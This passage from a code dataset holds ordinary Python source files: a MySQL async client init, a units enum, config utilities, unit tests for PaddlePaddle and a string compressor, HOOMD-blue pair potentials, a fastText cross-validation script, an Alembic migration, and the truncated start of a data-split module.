"1a30cdb47628e61535589b874104f41f740099a1", "content": "'''\nTorMySQL: presents a Tornado and asyncio Future-based API and greenlet for non-blocking access to MySQL.\n\nThe MIT License (MIT)\n\nCopyright (c) 2014, 2015 TorMySQL contributors\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\nfrom .client import Client\nfrom .cursor import Cursor, DictCursor, SSCursor, SSDictCursor\nfrom .pool import ConnectionPool\nfrom .cursor import CursorNotReadAllDataError, CursorNotIterError\nfrom .pool import ConnectionPoolClosedError, ConnectionPoolUsedError, ConnectionNotFoundError, ConnectionNotUsedError, ConnectionUsedError, WaitConnectionTimeoutError\nfrom .log import set_log\nfrom . import helpers\n\n\nversion = \"0.4.3\"\nversion_info = (0, 4, 3)\n\n\ndef connect(*args, **kwargs):\n client = Client(*args, **kwargs)\n from .platform import current_ioloop\n current_ioloop()\n return client.connect()\n\n\nConnection = connect"} {"ext": "py", "sha": "1a30cedd51c7910003261ce113a8040019783092", "content": "\"\"\"\n\nGuidelines for enum classes:\n 1. Write members names extensively, with no abbreviation, i.e., 'Watt' instead of 'W'.\n 2. Attributes should follow the International System of Units (SI) [https://en.wikipedia.org/wiki/International_System_of_Units], i.e., for power the attribute is 'W'.\n 3. Do not use multipliers such as 'Kilowatt'.\n 3.1 Exceptions to this rule are: 'Kilometer', 'Kilogram'.\n 3.2 In case of an exception, the simple form should be avoided altogether, e.g., given the 'Kilometer' is an Unit, then 'Meter' should not be used.\n\n\"\"\"\n\nimport enum\n\n@enum.unique\nclass DisplayNames(str, enum.Enum):\n ElectricityOutput = \"ElectricityOutput\"\n ElectricityInput = \"ElectricityInput\"\n\n@enum.unique\nclass LoadTypes(str, enum.Enum):\n Any = \"Any\"\n\n Electricity = \"Electricity\"\n Irradiance = \"Irradiance\"\n Speed = \"Speed\"\n Heating = \"Heating\"\n Cooling = \"Cooling\"\n\n Volume = \"Volume\"\n Temperature = \"Temperature\"\n Time = \"Time\"\n\n # Substance\n Gas = \"Gas\"\n Hydrogen = \"Hydrogen\"\n Oxygen = \"Oxygen\"\n Water = \"Water\"\n WarmWater = \"WarmWater\"\n \n Price = \"Price\"\n\n@enum.unique\nclass Units(str, enum.Enum):\n # Unphysical\n Any = \"-\"\n Percent = \"%\"\n\n # Power\n Watt = \"W\"\n kW = \"kW\"\n kWh_per_timestep = \"kWh per timestep\"\n\n # Power per area\n Wm2 = \"W per square meter\"\n Whm2 = \"Wh per square meter\"\n\n # Speed\n MeterPerSecond = \"m/s\"\n\n # Energy\n Wh = \"Wh\"\n kWh = \"kWh\"\n\n # Volume\n Liter = \"L\"\n\n # Volume per time\n l_per_timestep = \"Liter per timestep\"\n\n # Mass\n kg = \"kg\"\n\n # Mass flow\n kg_per_sec = \"kg/s\"\n\n # Degrees\n Celsius = \"°C\"\n Kelvin = 'K'\n\n # Degrees\n Degrees = \"Degrees\"\n\n # Time\n Seconds = \"s\"\n \n # Cost\n c_per_kWh = \"Cents per kWh\"\n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a30cfa53f348743fd4bf86be5cbcb11e737e4d5", "content": "import argparse\nimport collections\nimport json\nimport os\n\nimport numpy as np\nimport torch\nimport yaml\n\n__all__ = [\n \"load_config\",\n \"save_config\",\n \"flatten_dict\",\n \"sanitize_dict\",\n \"update_namespace\",\n \"extract\",\n \"s2b\",\n \"g\",\n]\n\n# Load config file\ndef load_yaml(f_path):\n with open(f_path, \"r\") as stream:\n return yaml.safe_load(stream)\n\n\ndef load_json(f_path):\n with open(f_path, \"r\") as f:\n return json.load(f)\n\n\ndef load_config(path, flatten=True):\n _, ext = os.path.splitext(path)\n\n assert ext in [\n \".json\",\n \".yaml\",\n \".yml\",\n ], f\"Only support yaml and json config, but '{ext}' given.\"\n if ext == \"json\":\n cfg = load_json(path)\n else:\n cfg = load_yaml(path)\n\n if cfg is None:\n cfg = dict()\n\n if flatten:\n cfg = flatten_dict(cfg)\n return cfg\n\n\n# Dump config file\ndef save_json(obj, f_path):\n with open(f_path, \"w\") as f:\n json.dump(obj, f, ensure_ascii=False, indent=4)\n\n\ndef save_yaml(obj, f_path):\n with open(f_path, \"w\") as f:\n yaml.dump(obj, f)\n\n\ndef save_config(obj, path, ext=None):\n _, fext = os.path.splitext(path)\n if fext.startswith(\".\"):\n fext = fext[1:]\n if fext != \"\":\n assert (\n ext == None or fext == ext\n ), f\"Extension conflict between '{path}' and '{ext}'.\"\n ext = fext\n\n if ext in [\"yaml\", \"yml\"]:\n save_yaml(obj, path)\n else:\n save_json(obj, path)\n\n\n# Utils\ndef flatten_dict(d, keep_parent=False, sep=\"_\", parent_key=\"\"):\n \"\"\"Flatten dict to only one nest\n\n Args:\n d (dict): dictionary to flatten\n keep_parent (bool, optional): If True, keep parent's key name, and keys should all be str. Defaults to False.\n sep (str, optional): Effective only keep_parent=True, separator between keys. Defaults to \"_\".\n parent_key (str, optional): For recursive call. Defaults to \"\".\n\n Returns:\n dict: flattened dict\n \"\"\"\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key and keep_parent else k\n if isinstance(v, collections.abc.MutableMapping):\n items.extend(\n flatten_dict(v, keep_parent, parent_key=new_key, sep=sep).items()\n )\n else:\n items.append((new_key, v))\n\n items_key = [i[0] for i in items]\n assert len(items_key) == len(set(items_key))\n\n return dict(items)\n\n\ndef sanitize_dict(params, to_str=True, none_fill=\"N/A\"):\n \"\"\"Convert all items into tensorboard supported values or str\n\n Args:\n params (dict): dict to sanitize\n to_str (bool, optional): If True, turn all items to string. Defaults to True.\n\n Returns:\n dict: sanitized dict\n \"\"\"\n items = []\n for k in params.keys():\n # numpy to float\n if isinstance(params[k], (np.bool_, np.integer, np.floating)):\n items.append([k, params[k].item()])\n elif isinstance(params[k], np.ndarray):\n items.append([k, str(params[k].tolist())])\n # torch to float\n elif isinstance(params[k], torch.Tensor):\n items.append([k, str(params[k].tolist())])\n # None to str\n elif params[k] is None:\n items.append([k, none_fill])\n # Others to str\n elif type(params[k]) not in [bool, int, float, str, torch.Tensor]:\n items.append([k, str(params[k])])\n else:\n items.append([k, params[k]])\n\n # All to str\n if to_str:\n items[-1][-1] = str(items[-1][-1])\n\n return dict(items)\n\n\ndef update_namespace(args, dictionary, overwrite=True, rest=False):\n \"\"\"update Namespace with given dictionary\n\n Args:\n args (Namespace): Namespace to be updated\n dictionary (dict): dictionary\n overwrite (bool, optional): If True, All Namespace value will overwritten by dictionary value. Otherwise, only Namespace with None will be overwritten. Defaults to True.\n rest: Effective only if overwrite=True. If True, add keys in dictionary but not in args into args. Otherwise raise an error.\n\n Returns:\n Namespace\n \"\"\"\n dict_args = vars(args)\n\n if overwrite:\n dict_args.update(dictionary)\n else:\n for k, v in dict_args.items():\n if v is not None:\n pass\n elif k in dictionary:\n dict_args[k] = dictionary[k]\n for k, v in dictionary.items():\n if k not in dict_args:\n if rest:\n dict_args[k] = v\n else:\n raise KeyError(f\"no key {k}\")\n\n args = argparse.Namespace(**dict_args)\n return args\n\n\ndef extract(s, delimit=\"-\", num=0):\n \"\"\"Extract the num_th word from string s\n\n Args:\n s (str): string to be parsed\n delimit (str, optional): delimiter. Defaults to \"-\".\n num (int, optional): . Defaults to 0.\n\n Returns:\n (str, List[str])\n \"\"\"\n s_list = s.split(delimit)\n first = s_list[num]\n s_list.pop(num)\n s_rest = delimit.join(s_list)\n return first, s_rest\n\n\n# argparse type\ndef s2b(v):\n if isinstance(v, bool):\n return v\n if v.lower() in (\"yes\", \"true\", \"t\", \"y\", \"1\"):\n return True\n elif v.lower() in (\"no\", \"false\", \"f\", \"n\", \"0\"):\n return False\n else:\n raise argparse.ArgumentTypeError(\"Boolean value expected.\")\n\n\n# template generator for params.py\ndef g(template, name_list, placeholder=\"{}\"):\n items = []\n for name in name_list:\n t = []\n t.append(template[0].replace(placeholder, name))\n t.append(template[1].replace(placeholder, name))\n t.extend(template[2:])\n items.append(t)\n return items\n"} {"ext": "py", "sha": "1a30cfa669f7ecab7cef4bb662d4d5ff96d72048", "content": "# -*- coding:utf-8 -*-\n\nimport unittest\n\nclass TestZip(unittest.TestCase):\n TESTDATA = [\n (\"aabbb\" , \"a2b3\"),\n (\"aaaa\", \"a4\"),\n (\"abc\", \"abc\"),\n (\"abcdd\",\"abcdd\")\n ]\n def setUp(self):\n self.judge = Zipper()\n\n def testsame(self):\n for src, exp in self.TESTDATA:\n self.assertEqual(self.judge.zipString(src),exp)\n\nclass Zipper:\n def zipString(self, iniString):\n # write code here\n record = []\n prevchar = None\n prevlen = 0\n\n for letter in iniString:\n if letter == prevchar:\n prevlen += 1\n else:\n if prevlen > 0:\n record.append({prevchar : prevlen})\n prevlen = 1\n prevchar = letter\n if prevlen > 0:\n record.append({prevchar : prevlen})\n newstring = ''\n for item in record:\n for key,value in item.iteritems():\n newstring += \"{}{}\".format(key,value)\n return newstring if len(newstring) < len(iniString) else iniString\n\n \nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30d1395283ec9bc60dcceaa1b5963b9176b60a", "content": "# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport unittest\nimport numpy as np\nimport sys\nsys.path.append(\"..\")\nfrom op_test import OpTest, skip_check_grad_ci\nimport paddle\nimport paddle.fluid.core as core\nimport paddle.fluid as fluid\nfrom paddle.fluid import compiler, Program, program_guard\nfrom paddle.fluid.framework import convert_np_dtype_to_dtype_\n\npaddle.enable_static()\n\n\nclass TestAny8DOp(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {\n 'X': np.random.randint(0, 2,\n (2, 5, 3, 2, 2, 3, 4, 2)).astype(\"bool\")\n }\n self.attrs = {'dim': (3, 5, 4)}\n self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAnyOpWithDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype(\"bool\")}\n self.attrs = {'dim': [1]}\n self.outputs = {'Out': self.inputs['X'].any(axis=1)}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAny8DOpWithDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {\n 'X': np.random.randint(0, 2,\n (2, 5, 3, 2, 2, 3, 4, 2)).astype(\"bool\")\n }\n self.attrs = {'dim': (3, 6)}\n self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAnyOpWithKeepDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype(\"bool\")}\n self.attrs = {'dim': (1), 'keep_dim': True}\n self.outputs = {\n 'Out': np.expand_dims(\n self.inputs['X'].any(axis=self.attrs['dim']), axis=1)\n }\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAny8DOpWithKeepDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {\n 'X': np.random.randint(0, 2,\n (2, 5, 3, 2, 2, 3, 4, 2)).astype(\"bool\")\n }\n self.attrs = {'dim': (1), 'keep_dim': True}\n self.outputs = {\n 'Out': np.expand_dims(\n self.inputs['X'].any(axis=self.attrs['dim']), axis=1)\n }\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30d2ed1b74ceaffb3883db6e04fdf92eac0e39", "content": "# -*- coding: utf-8 -*-\n# Copyright (c) 2018, Awab Abdoun and Mohammed Elamged and Contributors\n# See license.txt\nfrom __future__ import unicode_literals\n\nimport frappe\nimport unittest\n\nclass TestWorkstation(unittest.TestCase):\n\tpass\n"} {"ext": "py", "sha": "1a30d485a01b4350dc9549cb1de8c8e27d31ae76", "content": "# Copyright (c) 2009-2019 The Regents of the University of Michigan\n# This file is part of the HOOMD-blue project, released under the BSD 3-Clause License.\n\n# Maintainer: jglaser / All Developers are free to add commands for new features\n\nR\"\"\" Potentials between special pairs of particles\n\nSpecial pairs are used to implement interactions between designated pairs of particles.\nThey act much like bonds, except that the interaction potential is typically a pair potential,\nsuch as LJ.\n\nBy themselves, special pairs that have been specified in an initial configuration do nothing. Only when you\nspecify an force (i.e. special_pairs.lj), are forces actually calculated between the\nlisted particles.\n\"\"\"\n\nfrom hoomd import _hoomd\nfrom hoomd.md import _md\nfrom hoomd.md import force;\nfrom hoomd.md import bond;\nimport hoomd;\n\nimport math;\nimport sys;\n\nclass coeff:\n R\"\"\" Define special_pair coefficients.\n\n The coefficients for all special pair potentials are specified using this class. Coefficients are\n specified per pair type.\n\n There are two ways to set the coefficients for a particular special_pair potential.\n The first way is to save the special_pair potential in a variable and call :py:meth:`set()` directly.\n See below for an example of this.\n\n The second method is to build the coeff class first and then assign it to the\n special_pair potential. There are some advantages to this method in that you could specify a\n complicated set of special_pair potential coefficients in a separate python file and import\n it into your job script.\n\n Example::\n\n my_coeffs = hoomd.md.special_pair.coeff();\n special_pair_force.pair_coeff.set('pairtype1', epsilon=1, sigma=1)\n special_pair_force.pair_coeff.set('backbone', epsilon=1.2, sigma=1)\n\n \"\"\"\n\n ## \\internal\n # \\brief Initializes the class\n # \\details\n # The main task to be performed during initialization is just to init some variables\n # \\param self Python required class instance variable\n def __init__(self):\n self.values = {};\n self.default_coeff = {}\n\n ## \\var values\n # \\internal\n # \\brief Contains the vector of set values in a dictionary\n\n ## \\var default_coeff\n # \\internal\n # \\brief default_coeff['coeff'] lists the default value for \\a coeff, if it is set\n\n ## \\internal\n # \\brief Sets a default value for a given coefficient\n # \\details\n # \\param name Name of the coefficient to for which to set the default\n # \\param value Default value to set\n #\n # Some coefficients have reasonable default values and the user should not be burdened with typing them in\n # all the time. set_default_coeff() sets\n def set_default_coeff(self, name, value):\n self.default_coeff[name] = value;\n\n def set(self, type, **coeffs):\n R\"\"\" Sets parameters for special_pair types.\n\n Args:\n type (str): Type of special_pair (or a list of type names)\n coeffs: Named coefficients (see below for examples)\n\n Calling :py:meth:`set()` results in one or more parameters being set for a special_pair type. Types are identified\n by name, and parameters are also added by name. Which parameters you need to specify depends on the special_pair\n potential you are setting these coefficients for, see the corresponding documentation.\n\n All possible special_pair types as defined in the simulation box must be specified before executing run().\n You will receive an error if you fail to do so. It is not an error, however, to specify coefficients for\n special_pair types that do not exist in the simulation. This can be useful in defining a potential field for many\n different types of special_pairs even when some simulations only include a subset.\n\n Examples::\n\n my_special_pair_force.special_pair_coeff.set('pair1', epsilon=1, sigma=1)\n my_special_pair_force.pair_coeff.set('pair2', epsilon=0.5, sigma=0.7)\n my_special_pair_force.pair_coeff.set(['special_pairA','special_pairB'], epsilon=0, sigma=1)\n\n Note:\n Single parameters can be updated. If both ``k`` and ``r0`` have already been set for a particle type,\n then executing ``coeff.set('polymer', r0=1.0)`` will update the value of ``r0`` and leave the other\n parameters as they were previously set.\n\n \"\"\"\n hoomd.util.print_status_line();\n\n # listify the input\n type = hoomd.util.listify(type)\n\n for typei in type:\n self.set_single(typei, coeffs);\n\n ## \\internal\n # \\brief Sets a single parameter\n def set_single(self, type, coeffs):\n type = str(type);\n\n # create the type identifier if it hasn't been created yet\n if (not type in self.values):\n self.values[type] = {};\n\n # update each of the values provided\n if len(coeffs) == 0:\n hoomd.context.msg.error(\"No coefficients specified\\n\");\n for name, val in coeffs.items():\n self.values[type][name] = val;\n\n # set the default values\n for name, val in self.default_coeff.items():\n # don't override a coeff if it is already set\n if not name in self.values[type]:\n self.values[type][name] = val;\n\n ## \\internal\n # \\brief Verifies that all values are set\n # \\details\n # \\param self Python required self variable\n # \\param required_coeffs list of required variables\n #\n # This can only be run after the system has been initialized\n def verify(self, required_coeffs):\n # first, check that the system has been initialized\n if not hoomd.init.is_initialized():\n hoomd.context.msg.error(\"Cannot verify special_pair coefficients before initialization\\n\");\n raise RuntimeError('Error verifying force coefficients');\n\n # get a list of types from the particle data\n ntypes = hoomd.context.current.system_definition.getPairData().getNTypes();\n type_list = [];\n for i in range(0,ntypes):\n type_list.append(hoomd.context.current.system_definition.getPairData().getNameByType(i));\n\n valid = True;\n # loop over all possible types and verify that all required variables are set\n for i in range(0,ntypes):\n type = type_list[i];\n\n if type not in self.values.keys():\n hoomd.context.msg.error(\"Pair type \" +str(type) + \" not found in pair coeff\\n\");\n valid = False;\n continue;\n\n # verify that all required values are set by counting the matches\n count = 0;\n for coeff_name in self.values[type].keys():\n if not coeff_name in required_coeffs:\n hoomd.context.msg.notice(2, \"Notice: Possible typo? Force coeff \" + str(coeff_name) + \" is specified for type \" + str(type) + \\\n \", but is not used by the special pair force\\n\");\n else:\n count += 1;\n\n if count != len(required_coeffs):\n hoomd.context.msg.error(\"Special pair type \" + str(type) + \" is missing required coefficients\\n\");\n valid = False;\n\n return valid;\n\n ## \\internal\n # \\brief Gets the value of a single %special_pair %force coefficient\n # \\detail\n # \\param type Name of special_pair type\n # \\param coeff_name Coefficient to get\n def get(self, type, coeff_name):\n if type not in self.values.keys():\n hoomd.context.msg.error(\"Bug detected in force.coeff. Please report\\n\");\n raise RuntimeError(\"Error setting special_pair coeff\");\n\n return self.values[type][coeff_name];\n\n ## \\internal\n # \\brief Return metadata\n def get_metadata(self):\n return self.values\n\n\n## \\internal\n# \\brief Base class for special pair potentials\n#\n# A special pair in hoomd.* reflects a PotentialSpecialPair in c++. It is responsible\n# for all high-level management that happens behind the scenes for hoomd\n# writers. 1) The instance of the c++ bond force itself is tracked and added to the\n# System 2) methods are provided for disabling the force from being added to the\n# net force on each particle\nclass _special_pair(force._force):\n ## \\internal\n # \\brief Constructs the bond potential\n #\n # \\param name name of the bond potential instance\n #\n # Initializes the cpp_force to None.\n # If specified, assigns a name to the instance\n # Assigns a name to the force in force_name;\n def __init__(self, name=None):\n # initialize the base class\n force._force.__init__(self, name);\n\n self.cpp_force = None;\n\n # setup the coefficient vector (use bond coefficients for that)\n self.pair_coeff = coeff();\n\n self.enabled = True;\n\n def update_coeffs(self):\n coeff_list = self.required_coeffs;\n # check that the force coefficients are valid\n if not self.pair_coeff.verify(coeff_list):\n hoomd.context.msg.error(\"Not all force coefficients are set\\n\");\n raise RuntimeError(\"Error updating force coefficients\");\n\n # set all the params\n ntypes = hoomd.context.current.system_definition.getPairData().getNTypes();\n type_list = [];\n for i in range(0,ntypes):\n type_list.append(hoomd.context.current.system_definition.getPairData().getNameByType(i));\n\n for i in range(0,ntypes):\n # build a dict of the coeffs to pass to proces_coeff\n coeff_dict = {};\n for name in coeff_list:\n coeff_dict[name] = self.pair_coeff.get(type_list[i], name);\n\n param = self.process_coeff(coeff_dict);\n self.cpp_force.setParams(i, param);\n\n ## \\internal\n # \\brief Get metadata\n def get_metadata(self):\n data = force._force.get_metadata(self)\n\n # make sure coefficients are up-to-date\n self.update_coeffs()\n\n data['pair_coeff'] = self.pair_coeff\n return data\n\nclass lj(_special_pair):\n R\"\"\" LJ special pair potential.\n\n Args:\n name (str): Name of the special_pair instance.\n\n :py:class:`lj` specifies a Lennard-Jones potential energy between the two particles in each defined pair.\n\n This is useful for implementing e.g. special 1-4 interactions in all-atom force fields.\n\n The pair potential uses the standard LJ definition.\n\n .. math::\n :nowrap:\n\n \\begin{eqnarray*}\n V_{\\mathrm{LJ}}(r) = & 4 \\varepsilon \\left[ \\left( \\frac{\\sigma}{r} \\right)^{12} -\n \\alpha \\left( \\frac{\\sigma}{r} \\right)^{6} \\right] & r < r_{\\mathrm{cut}} \\\\\n = & 0 & r \\ge r_{\\mathrm{cut}} \\\\\n \\end{eqnarray*}\n\n where :math:`\\vec{r}` is the vector pointing from one particle to the other in the bond.\n\n Coefficients:\n\n - :math:`\\varepsilon` - *epsilon* (in energy units)\n - :math:`\\sigma` - *sigma* (in distance units)\n - :math:`\\alpha` - *alpha* (unitless) - *optional*: defaults to 1.0\n - :math:`r_{\\mathrm{cut}}` - *r_cut* (in distance units)\n\n Example::\n\n lj = special_pair.lj(name=\"my_pair\")\n lj.pair_coeff.set('pairtype_1', epsilon=5.4, sigma=0.47, r_cut=1.1)\n\n Note:\n The energy of special pair interactions is reported in a log quantity **special_pair_lj_energy**, which\n is separate from those of other non-bonded interactions. Therefore, the total energy of nonbonded interactions\n is obtained by adding that of standard and special interactions.\n\n .. versionadded:: 2.1\n\n \"\"\"\n def __init__(self,name=None):\n hoomd.util.print_status_line();\n\n # initialize the base class\n _special_pair.__init__(self);\n\n # check that some bonds are defined\n if hoomd.context.current.system_definition.getPairData().getNGlobal() == 0:\n hoomd.context.msg.error(\"No pairs are defined.\\n\");\n raise RuntimeError(\"Error creating special pair forces\");\n\n # create the c++ mirror class\n if not hoomd.context.exec_conf.isCUDAEnabled():\n self.cpp_force = _md.PotentialSpecialPairLJ(hoomd.context.current.system_definition,self.name);\n else:\n self.cpp_force = _md.PotentialSpecialPairLJGPU(hoomd.context.current.system_definition,self.name);\n\n hoomd.context.current.system.addCompute(self.cpp_force, self.force_name);\n\n # setup the coefficient options\n self.required_coeffs = ['epsilon','sigma','alpha','r_cut'];\n self.pair_coeff.set_default_coeff('alpha', 1.0);\n\n def process_coeff(self, coeff):\n r_cut = coeff['r_cut'];\n epsilon = coeff['epsilon'];\n sigma = coeff['sigma'];\n alpha = coeff['alpha'];\n\n lj1 = 4.0 * epsilon * math.pow(sigma, 12.0);\n lj2 = alpha * 4.0 * epsilon * math.pow(sigma, 6.0);\n r_cut_squared = r_cut * r_cut\n return _hoomd.make_scalar3(lj1, lj2, r_cut_squared);\n\n\nclass coulomb(_special_pair):\n R\"\"\" Coulomb special pair potential.\n\n Args:\n name (str): Name of the special_pair instance.\n\n :py:class:`coulomb` specifies a Coulomb potential energy between the two particles in each defined pair.\n\n This is useful for implementing e.g. special 1-4 interactions in all-atom force fields. It uses a standard Coulomb interaction with a scaling parameter. This allows for using this for scaled 1-4 interactions like in OPLS where both the 1-4 LJ and Coulomb interactions are scaled by 0.5.\n\n .. math::\n :nowrap:\n\n \\begin{eqnarray*}\n V_{\\mathrm{Coulomb}}(r) = & \\alpha \\cdot \\left[ \\frac{q_{a}q_{b}}{r} \\right] & r < r_{\\mathrm{cut}} \\\\\n = & 0 & r \\ge r_{\\mathrm{cut}} \\\\\n \\end{eqnarray*}\n\n where :math:`\\vec{r}` is the vector pointing from one particle to the other in the bond.\n\n Coefficients:\n\n - :math:`\\alpha` - Coulomb scaling factor (defaults to 1.0)\n - :math:`q_{a}` - charge of particle a (in hoomd charge units)\n - :math:`q_{b}` - charge of particle b (in hoomd charge units)\n - :math:`r_{\\mathrm{cut}}` - *r_cut* (in distance units)\n\n Example::\n\n coul = special_pair.coulomb(name=\"myOPLS_style\")\n coul.pair_coeff.set('pairtype_1', alpha=0.5, r_cut=1.1)\n\n Note:\n The energy of special pair interactions is reported in a log quantity **special_pair_coul_energy**, which\n is separate from those of other non-bonded interactions. Therefore, the total energy of non-bonded interactions\n is obtained by adding that of standard and special interactions.\n\n .. versionadded:: 2.2\n .. versionchanged:: 2.2\n\n \"\"\"\n def __init__(self, name=None):\n hoomd.util.print_status_line();\n\n # initialize the base class\n _special_pair.__init__(self);\n\n # check that some bonds are defined\n if hoomd.context.current.system_definition.getPairData().getNGlobal() == 0:\n hoomd.context.msg.error(\"No pairs are defined.\\n\");\n raise RuntimeError(\"Error creating special pair forces\");\n\n # create the c++ mirror class\n if not hoomd.context.exec_conf.isCUDAEnabled():\n self.cpp_force = _md.PotentialSpecialPairCoulomb(hoomd.context.current.system_definition,self.name);\n else:\n self.cpp_force = _md.PotentialSpecialPairCoulombGPU(hoomd.context.current.system_definition,self.name);\n\n hoomd.context.current.system.addCompute(self.cpp_force, self.force_name);\n\n # setup the coefficient options\n self.required_coeffs = ['alpha', 'r_cut'];\n self.pair_coeff.set_default_coeff('alpha', 1.0);\n\n def process_coeff(self, coeff):\n r_cut = coeff['r_cut'];\n alpha = coeff['alpha'];\n\n r_cut_squared = r_cut * r_cut;\n return _hoomd.make_scalar2(alpha, r_cut_squared);\n\n"} {"ext": "py", "sha": "1a30d52820578b9a5b4b5ce25638b5f0564f77fa", "content": "#!/usr/bin/python3\n\"\"\"\n fasttextRun.py: run fasttext via python interface\n usage: fasttextRun.py -f file [-n N]\n note: default number of N is 10 (10-fold cross validation)\n 20180105 erikt(at)xs4all.nl\n\"\"\"\n\nimport fasttext\nimport os\nimport random\nimport splitFile\nimport sys\n\nCOMMAND = sys.argv.pop(0)\nDIM = 300\nLARGENUMBER = 100000\nMINCOUNT = 5\nrandom.seed()\nTMPFILENAME = \"fasttextRun.\"+str(os.getpid())+\".\"+str(random.randint(0,LARGENUMBER))\n\ndef makeTrainFile(inFileName,i,n):\n outFileName = TMPFILENAME+\".train\"\n outFile = open(outFileName,\"w\")\n for j in range(0,n):\n if j != i:\n inFile = open(inFileName+\".\"+str(j),\"r\")\n for line in inFile: outFile.write(line)\n inFile.close()\n outFile.close()\n return(outFileName)\n\ndef fasttextRun(inFileName,i,n):\n trainFileName = makeTrainFile(inFileName,i,n)\n modelFileName = TMPFILENAME+\".model\"\n testFileName = inFileName+\".\"+str(i)\n classifier = fasttext.supervised(trainFileName,modelFileName,dim=DIM,min_count=MINCOUNT)\n # ,pretrained_vectors=\"/home/erikt/software/fastText/wiki.nl.vec\")\n result = classifier.test(testFileName)\n os.unlink(trainFileName)\n os.unlink(modelFileName+\".bin\")\n return(result.precision)\n\ndef main(argv):\n inFileName, n = splitFile.processOpts(list(argv))\n data = splitFile.readData(inFileName)\n splitFile.writeData(inFileName,data,n)\n accuracyTotal = 0.0\n for i in range(0,n):\n accuracy = fasttextRun(inFileName,i,n)\n accuracyTotal += accuracy\n print(\"Fold: {0:0d}; Accuracy: {1:0.3f}\".format(i,accuracy))\n print(\"Average accuracy {0:0.3f}\".format(accuracyTotal/float(n)))\n return(0)\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n\n"} {"ext": "py", "sha": "1a30d5333d9aa11674a21e729d83eab98d8c4682", "content": "# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nRemove useless index\n\nRevision ID: 7750037b351a\nRevises: f449e5bff5a5\nCreate Date: 2016-12-17 21:10:27.781900\n\"\"\"\n\nfrom alembic import op\n\n\nrevision = \"7750037b351a\"\ndown_revision = \"f449e5bff5a5\"\n\n\ndef upgrade():\n op.drop_index(\"release_files_name_idx\", table_name=\"release_files\")\n\n\ndef downgrade():\n op.create_index(\"release_files_name_idx\", \"release_files\", [\"name\"], unique=False)\n"} {"ext": "py", "sha": "1a30d74ada71fef6bf218e5e7da43d24872e31fd", "content": "# coding: utf8\n\nfrom .tsv_utils import complementary_list, find_label, baseline_df, chi2\nfrom clinicaaddl.tools.deep_learning.iotools import return_logger\nfrom scipy.stats import ttest_ind\nimport shutil\nimport pandas as pd\nfrom os import path\nimport numpy as np\nimport os\nimport logging\n\nsex_dict = {'M': 0, 'F': 1}\n\n\ndef create_split(diagnosis, diagnosis_df, n_test,\n pval_threshold_ttest=0.80, t_val_chi2_threshold=0.0642,\n ignore_demographics=False, logger=None):\n \"\"\"\n Split data at the subject-level in training and test set with equivalent age and sex distributions\n\n :param diagnosis: (str) diagnosis on which the split is done\n :param diagnosis_df: DataFrame with columns including ['participant_id', 'session_id', 'diagnosis']\n :param 